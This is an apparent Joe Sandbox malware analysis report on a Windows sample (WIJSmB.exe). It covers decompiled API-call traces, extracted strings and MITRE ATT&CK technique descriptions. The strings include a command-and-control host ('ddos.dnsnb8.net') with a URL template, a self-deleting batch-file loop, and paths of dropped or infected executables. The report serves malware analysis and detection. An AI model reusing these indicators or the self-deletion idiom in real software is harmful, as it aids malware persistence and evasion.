Part of subcall function 004A1973: wsprintfA.USER32 ref: 004A19EC
Part of subcall function 004A1973: CopyFileA.KERNEL32(?,?,00000000), ref: 004A1A00
Part of subcall function 004A1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004A1A1E
Part of subcall function 004A1973: GetFileSize.KERNEL32(?,00000000), ref: 004A1A2C
Part of subcall function 004A1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004A1A46
Part of subcall function 004A1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004A1A65

DeleteFileA.KERNEL32(?,?,004A4E54,004A4E58), ref: 004A281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,004A4E54,004A4E58), ref: 004A2832

Strings

C:\Windows\system32, xrefs: 004A27E3
%s%.8x.exe, xrefs: 004A27BB
\WinRAR\Rar.exe, xrefs: 004A2793
%s\%s, xrefs: 004A27EE
%s%s, xrefs: 004A27A5
C:\Users\user\AppData\Local\Temp\, xrefs: 004A27B6
c_31892.nls, xrefs: 004A27DE

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-613076915
Opcode ID: 03b9bf8263f9a5ad9d188064c2dfd6339d7484ee30bc5c1cd3cee809019b1b82
Instruction ID: bb65327635c3b7b2992510e94eb779a7b4004af829c3f2b187b500a641e4e8e6
Opcode Fuzzy Hash: 03b9bf8263f9a5ad9d188064c2dfd6339d7484ee30bc5c1cd3cee809019b1b82
Instruction Fuzzy Hash: E621A7F6D4021C7BEB10EBA49C89FDB776CDB66719F0005A7B604E2041F6B8DF448A68

Function 004A1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004A185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
Part of subcall function 004A185B: srand.MSVCRT ref: 004A1878
Part of subcall function 004A185B: rand.MSVCRT ref: 004A1880
Part of subcall function 004A185B: srand.MSVCRT ref: 004A1890
Part of subcall function 004A185B: rand.MSVCRT ref: 004A1894

wsprintfA.USER32 ref: 004A15AA
wsprintfA.USER32 ref: 004A15C6
lstrlen.KERNEL32(?), ref: 004A15D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 004A15EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 004A1609
CloseHandle.KERNEL32(00000000), ref: 004A1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 004A162D

Strings

:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 004A15C0
open, xrefs: 004A1627
%s%.8x.bat, xrefs: 004A15A4
C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A158A, 004A15B3, 004A15B8, 004A15B9
C:\Users\user\AppData\Local\Temp\, xrefs: 004A1599

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\WIJSmB.exe$open
API String ID: 617340118-1533954134
Opcode ID: 8a4c745c3149b512092aa286c61459e8dbf7ed10e6a4e6471ae17a32aac36388
Instruction ID: 653a1838665e399c378b65f47bb8ddbe1394830db22ef3fa0f04d7ca59d58685
Opcode Fuzzy Hash: 8a4c745c3149b512092aa286c61459e8dbf7ed10e6a4e6471ae17a32aac36388
Instruction Fuzzy Hash: CC11A772A011287BD7209BA49C89EEB7F6CDF6B311F000062F549E2040EA749F848BB8

Function 004A120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,004A1400), ref: 004A1226
GetProcAddress.KERNEL32(00000000), ref: 004A122D
GetCurrentProcessId.KERNEL32(?,?,?,?,004A1400), ref: 004A123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,004A1400), ref: 004A1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,004A1400), ref: 004A129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,004A1400), ref: 004A12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\WIJSmB.exe,?,?,?,?,004A1400), ref: 004A12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,004A1400), ref: 004A130A

Strings

ntdll.dll, xrefs: 004A1219
ZwQuerySystemInformation, xrefs: 004A1212
C:\Users\user\AppData\Local\Temp\WIJSmB.exe, xrefs: 004A1262

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\WIJSmB.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-2805263023
Opcode ID: d8e23c32fe55573f4ca904b049126645eba80bc6d912bbb5f22fcbb321e53db6
Instruction ID: 922ff6d232d3f4bc5a9f2702ffedb891710b36254e0fb3ba60ad136e680fb2e8
Opcode Fuzzy Hash: d8e23c32fe55573f4ca904b049126645eba80bc6d912bbb5f22fcbb321e53db6
Instruction Fuzzy Hash: 2C210972609311ABD7209F54CC04F6BBEA8FB97B01F10092AF545F6290D774D940C7AD

Function 004A189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004A18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,75920F00,75A78400), ref: 004A18D3
CloseHandle.KERNEL32(I%J), ref: 004A18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004A18F0
GetExitCodeProcess.KERNEL32(?,?), ref: 004A1901
CloseHandle.KERNEL32(?), ref: 004A190A

Strings

I%J, xrefs: 004A18E0

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID: I%J
API String ID: 876959470-4277147444
Opcode ID: 063734148c8c76338de6d1460c4a758613c5df4351fcc63673e341595dd1cbdd
Instruction ID: 273c1d4ccbdd8534e26abcb7d327f0c65ee5e14185f21df1e74afc39cfde98cf
Opcode Fuzzy Hash: 063734148c8c76338de6d1460c4a758613c5df4351fcc63673e341595dd1cbdd
Instruction Fuzzy Hash: 4601BC72900128BBCB20AF96DC08DDFBF3DEF86331F004022FA15A11A4D2354A18CAA4

Function 004A185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A78400,http://%s:%d/%s/%s,?,?,?,004A1118), ref: 004A1867
srand.MSVCRT ref: 004A1878
rand.MSVCRT ref: 004A1880
srand.MSVCRT ref: 004A1890
rand.MSVCRT ref: 004A1894

Strings

ddos.dnsnb8.net, xrefs: 004A1862
http://%s:%d/%s/%s, xrefs: 004A1860

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: 99feb8c64e310b6216819a6c4dc7e9d8da58b91c58b5faaeb088befd24bd2945
Instruction ID: 6173bacedae3bf9512857555a57ce14b3ba0418b2ea7140529a015d34f1f3c12
Opcode Fuzzy Hash: 99feb8c64e310b6216819a6c4dc7e9d8da58b91c58b5faaeb088befd24bd2945
Instruction Fuzzy Hash: 76E0D877A04218BBD700ABF9EC4689EBFACDE85162B110537F600D3254F570FD448AB8

Function 004A2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7591E800,?,?,004A29DB,?,00000001), ref: 004A26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,7591E800,?,?,004A29DB,?,00000001), ref: 004A26B5
lstrlen.KERNEL32(?), ref: 004A26C4
??2@YAPAXI@Z.MSVCRT(-00000005), ref: 004A26CE
lstrcpy.KERNEL32(00000004,?), ref: 004A26E3
lstrcpy.KERNEL32(?,00000004), ref: 004A271F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 004A272D
SetEvent.KERNEL32 ref: 004A273C

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: b5e46d9cc989f1a7b57703141c2f92353253138e211bedf5c27afe10918dced7
Instruction ID: 77e37d32be14d0488f5cf42d7ece11076c88d315ac3d83a435b86241d6193174
Opcode Fuzzy Hash: b5e46d9cc989f1a7b57703141c2f92353253138e211bedf5c27afe10918dced7
Instruction Fuzzy Hash: F411BE39404100EFCB219F19EE4885F7FA9FBE3721720403AF45587220E7B48E81EB58

Function 004A1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 004A1BCD
rand.MSVCRT ref: 004A1BD8
memset.MSVCRT ref: 004A1C43
memcpy.MSVCRT(?,OQVwJMDijGEsBvlSNYIfTzxdNAbivRhZrguobSKndIkcDrqedQLBbFrjXeStDvwFcUloZqypgKUztylJLCpIesMVFOZauWLxhXztmaxkqskphoOWVGPjWQmEKnANCfXwPMTHCTUAGHyYuRBRYngcJaimPHfE,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 004A1C4F
lstrcat.KERNEL32(?,.exe), ref: 004A1C5D

Strings

.exe, xrefs: 004A1C57
OQVwJMDijGEsBvlSNYIfTzxdNAbivRhZrguobSKndIkcDrqedQLBbFrjXeStDvwFcUloZqypgKUztylJLCpIesMVFOZauWLxhXztmaxkqskphoOWVGPjWQmEKnANCfXwPMTHCTUAGHyYuRBRYngcJaimPHfE, xrefs: 004A1B8A, 004A1B9C, 004A1C15, 004A1C49

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$OQVwJMDijGEsBvlSNYIfTzxdNAbivRhZrguobSKndIkcDrqedQLBbFrjXeStDvwFcUloZqypgKUztylJLCpIesMVFOZauWLxhXztmaxkqskphoOWVGPjWQmEKnANCfXwPMTHCTUAGHyYuRBRYngcJaimPHfE
API String ID: 122620767-1997809253
Opcode ID: c7401e173ce03c995490744a6a38f662c0ca1dd908d18e44c9847fdf1e6d6fe3
Instruction ID: 65ff7c890e4c6fabd7bb436ba0ad02a6cb0d543a433327bad9ec3f07f2a59f3f
Opcode Fuzzy Hash: c7401e173ce03c995490744a6a38f662c0ca1dd908d18e44c9847fdf1e6d6fe3
Instruction Fuzzy Hash: A2215E22E441906ED32513356C41BAF7F448FF7721F5540BBF5852B2F2E1AC1985827C

Function 004A1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 004A1334
GetProcAddress.KERNEL32(00000000), ref: 004A133B
memset.MSVCRT ref: 004A1359

Strings

ntdll.dll, xrefs: 004A132F
NtSystemDebugControl, xrefs: 004A132A

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: c1fc95627657b0455e76d8d5c30de3dda043eaf3ff7eaf721f62b4da211075cf
Instruction ID: 582ba7ce8f8960751808e02cf775ee87b93dd1f8f781d2c6873c7d6d46bbea07
Opcode Fuzzy Hash: c1fc95627657b0455e76d8d5c30de3dda043eaf3ff7eaf721f62b4da211075cf
Instruction Fuzzy Hash: D2016171600309BFEF10DFA4AC85A6FBB6CFB62315F00413BF941A1550E3B48655CB59

Function 004A1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 004A1E0B
lstrcpy.KERNEL32(?,00000001), ref: 004A1E1C
strrchr.MSVCRT ref: 004A1E2B
lstrcmpiA.KERNEL32(?,004A4488), ref: 004A1E48
lstrlen.KERNEL32(004A4488), ref: 004A1E53

Memory Dump Source

Source File: 00000001.00000002.2332636926.00000000004A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004A0000, based on PE: true

Associated: 00000001.00000002.2332615912.00000000004A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332655324.00000000004A3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332677324.00000000004A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2332698552.00000000004A6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4a0000_WIJSmB.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 7cf949a81b1b9ca4a23e5cb29efecc56799d0d5ed5e3ed34810011b8376bb6ad
Instruction ID: e56c615296eaf1c3b327442f56ef169f187d402bc47d242fe118764a0df5eaa9
Opcode Fuzzy Hash: 7cf949a81b1b9ca4a23e5cb29efecc56799d0d5ed5e3ed34810011b8376bb6ad
Instruction Fuzzy Hash: 2501DB729082156FDB105B60DC48BD77BDCDB16351F040077E945D2090E6B89E848B98

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5vrRrFN56j.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_WIJSmB.exe_bcec74cffcfc8b7f4908e51651899551f448b2_102367fa_2e9cc071-e605-4c71-9947-9d737dd663a6\Report.wer

